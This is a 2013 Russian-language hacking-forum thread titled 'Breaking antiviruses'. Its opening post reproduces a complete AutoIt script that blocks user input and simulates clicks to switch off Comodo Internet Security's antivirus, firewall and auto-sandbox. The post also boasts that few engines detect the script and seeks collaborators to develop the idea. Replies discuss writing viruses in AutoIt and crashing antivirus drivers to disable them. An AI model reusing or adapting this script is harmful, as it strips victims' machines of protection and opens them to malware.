Ломаем антивирусы

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем X-Shar, 17 ноя 2013.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Рад, что на хакзоне наконец-то начили писать нормальные и актуальные статьи, вот наткнулся на одну интересную статейку:

    Привет всем. Давно мучает идея, можно ли найти универсальный способ против любого антивируса?

    И тут на глаза случайно попался довольно простой в обращении язык AutoIt v.3. Изначально язык предназначен для управления графическим интерфейсом Windows. Я так подумал, и решил, что с помощью него можно иммитировать нажатия мыши и отключать антивирусы пользовательским способом, как делают это обычные юзеры.

    Первой жертвой я выбрал неизвестный мне ранее вирус Comodo (просто стоял у моей тёти на компьютере). Хочу сразу предоставить код KillComodo.au3:
    Код:
    #cs ----------------------------------------------------------------------------
     
    AutoIt Version: 3.3.8.1
    Author:		 Ryder95
     
    Script Function:
    Отключает всю систему защиту Comodo Internet Security Premium
     
    #ce ----------------------------------------------------------------------------
     
    ; Script Start - Add your code below here
    Global $msg[4];Переменная для информации об окне оповещения
    Break(0);Попытка отключения возможности отключения скрипта пользователем
    If @OSVersion="WIN_7" then $WarnName="" ;Имя окна оповещения
    If @OSVersion="WIN_8" then $WarnName="COMODO Оповещение об отключении компонента";Имя окна оповещения
    BlockInput(1) ;Попытка отключить устройства ввода пользователя
    Select ;Запуск Comodo
      Case not WinExists("COMODO Internet Security Premium ");Если программа не запущена...
      Run(@ProgramFilesDir & "\COMODO\COMODO Internet Security\cistray.exe --shortcut");...то запуск программы
      AutoItSetOption("WinTitleMatchMode",3);Настройки поиска главного окна
      WinWaitActive("COMODO Internet Security Premium ","",10);Ждём, когда активируется
      Case not WinActive("COMODO Internet Security Premium ");Если не активна...
      WinActivate("COMODO Internet Security Premium ");...то активируем главное окно
    EndSelect 
    $main=WinGetPos("COMODO Internet Security Premium ") ;Получение позиций главного окна
    sleep(500) ;Пауза (дать компьютеру успеть выполнить действие на экране)
    MouseClick("left",$main[0]+Round($main[2]*0.8844),$main[1]+Round($main[3]*0.2948),1,100) ;Отключение защиты
    sleep(5000) ;Пауза
    MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+Round($main[3]*0.3137),1,100) ;Отключение антивируса
    OffWarn();вызов функции, работающей с окном оповещения
    WinActivate("COMODO Internet Security Premium ");Активируем окно Comodo
    sleep(500) ;Пауза
    MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+round($main[3]*0.4008),1,100) ;Отключение фаервола
    OffWarn()
    WinActivate("COMODO Internet Security Premium ") ;Активируем окно Comodo
    sleep(500) ;Пауза
    MouseClick("left",$main[0]+Round($main[2]*0.8983),$main[1]+round($main[3]*0.4877),1,100) ;Отключение Авто-Sandbox
    OffWarn()
    WinActivate("COMODO Internet Security Premium ") ;Активируем окно Comodo
    sleep(500) ;Пауза
    WinClose("COMODO Internet Security Premium ");закрываем главное окно
     
    Func OffWarn();функция, работающая с окном оповещения
      $s=WinWait($WarnName,"",5);Ждём появления оповещения
      if @OSVersion="WIN_8" and $s=0 then Return
      WinActivate($WarnName)
      Select
      Case @OSVersion="WIN_8"
      $msg=WinGetPos($WarnName) ;Получаем координаты окна оповещения
      Case @OSVersion="WIN_7"
      $msg[0]=@DesktopWidth-462
      $msg[1]=@DesktopHeight-round(@DesktopHeight*0.0666)-289
      $msg[2]=462
      $msg[3]=289
      EndSelect
      if $msg[0]+$msg[2]<=@DesktopWidth  then ;Если окно оповещения не заходит за правую границу стола
      MouseClick("left",$msg[0]+Round($msg[2]*0.9264),$msg[1]+Round($msg[3]*0.6989),1,100)
      Else
      MouseClick("left",@DesktopWidth-20,$msg[1]+Round($msg[3]*0.6989),1,100)
      endif
      sleep(500) ;Пауза
      if @DesktopHeight-$msg[1]-$msg[3]>=round($msg[3]*0.044) Then ;Если меню снизу
      if ($msg[0]>=0) and ($msg[0]+$msg[2]<=@DesktopWidth) then MouseClick("left",$msg[0]+Round($msg[2]*0.1233),$msg[1]+Round($msg[3]*1,006),1,100) ;Если окно оповещения не заходит за границы стола
      if $msg[0]<0 then MouseClick("left",Round($msg[2]*0.0735),$msg[1]+Round($msg[3]*1,006),1,100) ;если окно за левой границей
      if $msg[0]+$msg[2]>@DesktopWidth then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*1,006),1,100) ;если окно за правой границей
      Else
      if ($msg[0]>=0) and ($msg[0]+$msg[2]<=@DesktopWidth) then MouseClick("left",$msg[0]+Round($msg[2]*0.1190),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно оповещения не заходит за границы
      if $msg[0]<0 then MouseClick("left",Round($msg[2]*0.0714),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно за левой границей
      if $msg[0]+$msg[2]>@DesktopWidth then MouseClick("left",@DesktopWidth-Round($msg[2]*0.8225),$msg[1]+Round($msg[3]*0.6366),1,100) ;если окно за правой границей
      EndIf 
      sleep(500) ;Пауза
      MouseClick("left",$msg[0]+round($msg[2]*0.6082),$msg[1]+round($msg[3]*0.9377),1,100)
    EndFunc 

    Минусы и недочёты скажу сразу, проверял только на двух ОС - Windows 7 (x86) и Windows 8 (x64)

    Минусы на семёрке:

    -Проблема с выбором времени при отключении функций антивируса
    -Программа не будет работать, если на рабочем столе включено автоматическое исчезание панели задач
    -Когда пытался записать видео с работой скрипта - скрипт просто не смог запуститься, причём когда захват видео отключался, скрипт работал
    Минусы на восьмёрке:
    -Скомпилированная программа не запускается просто так, она требует запуск от имени администратора, когда же происходит запуск администратором, Comodo ругается на неё, хотя даёт выбор - запустить или нет. Но велика возможность того, что пользователь блокирует программу и задача не будет выполнена.

    Также проверил программу на блокировку антивирусами на сайте www.virustotal.com.

    В общем, 3 антивируса из 46 признали KillComodo вирусом, и что странно, сам Comodo не в их числе.

    Очень хотелось бы отзывов, предложений по поводу "можно ли дальше развивать данную идею?". Если это возможно, то хотелось бы найти единомышленников.

    Источник, а также там можно связаться с автором: http://www.hackzone.ru/articles/view/id/9525/

    Видео использования программы:

     
    • Мне нравится Мне нравится x 8
  2. BioNIX Гость
    BioNIX
    Ответить в чате

    Репа:
    +0 / 0 / -0
    X-Shar, Ну единомышленников найдешь, а дальше последствия, рано или поздно все обернется против, если хочешь вести такую тему, то надо полностью быть анонимом, и никакой информации о себе не распространять в сети, мало ли отслеживание по IP или тем же аккаунтам типа GOOGLE который объединит различные аккаунты входящие с одного IP и как не печально это может закончится очень плохо. Хакерство во благо это хорошо, потому, что таким способом ищется уязвимость в антивирусах, и рано или поздно этим антивирусом отправится отчет его работы и сбоя, и какой процесс и служба вызвала сбой в антивирусе, будет выпущен патч и дырку залатают, с такой стороны искать уязвимости можно и получить номинацию, а если делать во вред то можно получить и срок длительный. Я думаю, что во благо да это идея хорошая, но посчитают ли службы это благим намерением, это вопрос времени.
     
    • Мне нравится Мне нравится x 3
  3. BioNIX Гость
    BioNIX
    Ответить в чате

    Репа:
    +0 / 0 / -0
    Это очень серьезный язык программирования и развивается очень хорошо предпочтение идет именно по нему, и вирусы пишутся именно на этом языке, и много антивирусов не могут определить этот вид вируса.
     
    • Мне нравится Мне нравится x 5
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Именно поэтому я и не выложил бинарник, да и автор не я если что ! ;)
    AutoIt - Это не серьёзно, надо писать вирусы на С++, или языках близких к ассеблеру !

    Вот например на каспере уже этот способ не сработает, т.к. он лочит попытку виртуального взаимодействия, доктор кстати тоже + требует ввести капчу !

    А вот если попытаться вызвать ошибку в драйвере каспера, или веба, вот тогда может получится отключить антивирус ! sm3888
     
    • Мне нравится Мне нравится x 5
  5. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.181
    Симпатии:
    11.095
    Пол:
    Мужской
    Репа:
    +11.243 / 47 / -6
    Jabber:
    Skype:
    Мы то тебе верим,а вот что скажет специализированный отдел...А багов у этого скрипта ещё предостаточно (да и наверное не все ещё выявлены),но для экспериментов очень даже интересная вещь.
     
    • Мне нравится Мне нравится x 4
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А может это как раз то, что они искали ? Отдыхай!!!
    Специализированный отдел тоже любит что-нибудь сломать ! sm3888
     
    • Мне нравится Мне нравится x 4
  7. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Ну вот доприкалывался, уже какой-то микроавтобус около дома стоит с тонированными окнами, похоже перехватывают сигнал ! sholoh it
    Говорил-же надо-было SSL внедрять ! wacko88
    И не стыдно вам, я хотел пошутить, а уже позвонили, сообщили в ФСБ ! ohmy88

    Вот и верь после этого людям ! ogo-go
     
    • Мне нравится Мне нравится x 5
  8. BLONDY HACKER :))
    BLONDY HACKER
    Ответить в чате

    Форумчанин

    Регистрация:
    07.12.2012
    Сообщения:
    3.111
    Симпатии:
    13.972
    Пол:
    Женский
    Репа:
    +13.979 / 3 / -1
    Всё, походу забрали нашего Олега i cray fear [​IMG] скидываемся [​IMG]кто сколько может, попробуем[​IMG] выкупить
     
    • Мне нравится Мне нравится x 5
  9. BLONDY HACKER :))
    BLONDY HACKER
    Ответить в чате

    Форумчанин

    Регистрация:
    07.12.2012
    Сообщения:
    3.111
    Симпатии:
    13.972
    Пол:
    Женский
    Репа:
    +13.979 / 3 / -1
    Неужели i cray никого не волнует судьба Олега??ogo-go После долгих переговоров - остановились на сумме 5000за выкуп. Покаohmy88 дяденьки полицейские добрые, надо успеть выкупитьnea88
     
    • Мне нравится Мне нравится x 5
  10. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.181
    Симпатии:
    11.095
    Пол:
    Мужской
    Репа:
    +11.243 / 47 / -6
    Jabber:
    Skype:
    Да понимаешь.Ленок-бабла нетI'm sorry,ваще ни копья в кармане.После того как Олег перестал к нам с Люськой в буфет ходить,дела совсем встали...теперь наверное по миру пойдём с протянутой рукой.Олегу могу лишь помочь сухарями и чаем,больше ни фига нет((
     
    • Мне нравится Мне нравится x 4

Поделиться этой страницей